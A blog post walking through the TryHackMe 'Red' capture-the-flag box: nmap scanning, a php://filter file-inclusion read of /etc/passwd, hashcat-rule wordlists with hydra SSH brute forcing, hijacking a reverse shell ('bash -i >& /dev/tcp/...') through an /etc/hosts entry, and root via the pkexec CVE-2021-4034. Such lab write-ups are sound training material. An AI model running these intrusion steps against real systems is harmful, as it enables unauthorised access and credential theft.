Post

THM - Red writeup

Hi,

been a long time since my last post. I have done some easy boxes on TryHackMe. And this is the writeup for one of those boxes I have done: Red

Information Gathering

As always, lets start with nmap. I have my routine in using nmap: First I set the current target ip into a variable

1
2
3
TARGET="TARGET_IP"
# or for fish shell, which I have choose as my default shell
set TARGET TARGET_IP

With this, I always use a default port scan followed by a service scan:

1
nmap -Pn $TARGET -oN ports && nmap -Pn -sC -sV -p $(grep '.*(?=\/tcp)' ports | tr '\n' ',') $TARGET -oN services

I only use -p- when I’m stuck and desperate.

This scan reveals only two open ports:

  • 80 is running a webserver
  • 22 running ssh

Website

atlas_website.png

As this is a CTF, I searched for hidden hints on the website, but couldn’t find any. But one thing got my attention, the url provides a variable:

1
?page=

So I tried some LFI techniques and run feroxbuster but sadly there where no useful outputs.

Then I tried php filters and got some useful outputs.

1
curl http://$TARGET:80/index.php?page=php://filter/resource=/etc/passwd

curl_passwd.png

Now there is our way in!

First flag

I tried nearly everything, to get more information or even a real foothold without luck.

1
2
3
4
/home/blue/.ssh/
/home/red/.ssh/
/etc/crontab
...

But then I found something on blue’s home directory:

bash_history.png

Sadly the passlist.txt file was deleted, but the way to build it is well documentated and the .reminder file still persists and is readable.

Now to build our wordlist (yes I tried it with rockyou.txt before, its a waste of time) we have to do the same thing, as red obviously did.

Download the ruleset for hashcat if you miss it on your system: best64.rule

Now run the same command locally:

1
hashcat --stdout .reminder -r ./best64.rule > passlist.txt

With the wordlist used to set the password of blue, we can now try to crack it against ssh.

1
hydra -I -l blue -P ./passlist.txt ssh://$TARGET

It will not take for long to find the password of the user blue:

crack_blue.png

Now log in via ssh and print out the first flag, which lays in /home/blue directory.

Second flag

While I was searching for an opportunity for lateral movement, my session disconnected…

suprise.png

And there are print outs of the user red. (simulated, for sure)

I checked for SUID, cron jobs and misconfigurations in files, but nothing useful there. And while looking around, “red” kept kicking me out of the shell. Everytime I was kicked out, I had to bruteforce the password of user blue, because it had been changed. And yeah, I already tried to change the password to avoid being kicked out:

pwchange.png

Next I looked into the running processes, and couldn’t find any suspicious process running by root, but one running by red:

1
bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &

Obviously a reverse shell to a specific fqdn. Checking the /etc/hosts file and it contains the fqdn. I couldn’t figure out where the command lays on the system. Even if I locate the command’s executable, blue may not have the permission to read or execute the command.

After a while, I realized something! Every time when “red” writes a message to us, one of the two running reverse shell instances will be replaced from a new instance of the same reverse shell command:

cronjob.png

This means, that there is some cronjob running and it calls the command. Because there are two instances of the reverse shell command, we may have luck and the second command could be used to get a shell as user “red”. In most modern system, if the fqdn resolves to multiple ips and the first ip is busy with an instance of the command, subsequent instances of the same command may attempt to connect to the other ip addresses associated with the fqdn.

Ok, fine. I just need to add my ip into the /etc/hosts file then. But there is one problem with that, the hosts file can’t be written with texteditor like nano or vi. By using lsattr it can be seen that the file has append-only permission. So I had to use some sort of redirection.

1
echo "<MY-IP> redrules.thm" >> /etc/hosts

Running a netcat listener on port 9001, I was able to get a shell as user “red”.

Root flag

The root flag is an easy one, because on user red’s home, there is a .git directory where an executable called pkexec lays.

pkexecVersion.png

By looking up the version of pkexec on google, there can be seen a vulnerability: CVE-2021-4034

Most of the PoC’s are written in C, but I searched for a python version of the exploit, to avoid the building process, and found one on github: joeammond’s CVE-2021-4034

For this PoC to work, I had to change the last line, which is referring to the pkexec location. After that, just upload it to the target with a python http server open.

1
python -m http.server 9090

rootID.png

Now as root the root flag can be printed out easely…

Good luck :)


darksoulsMeme.png

All rights reserved by Fatos Shala.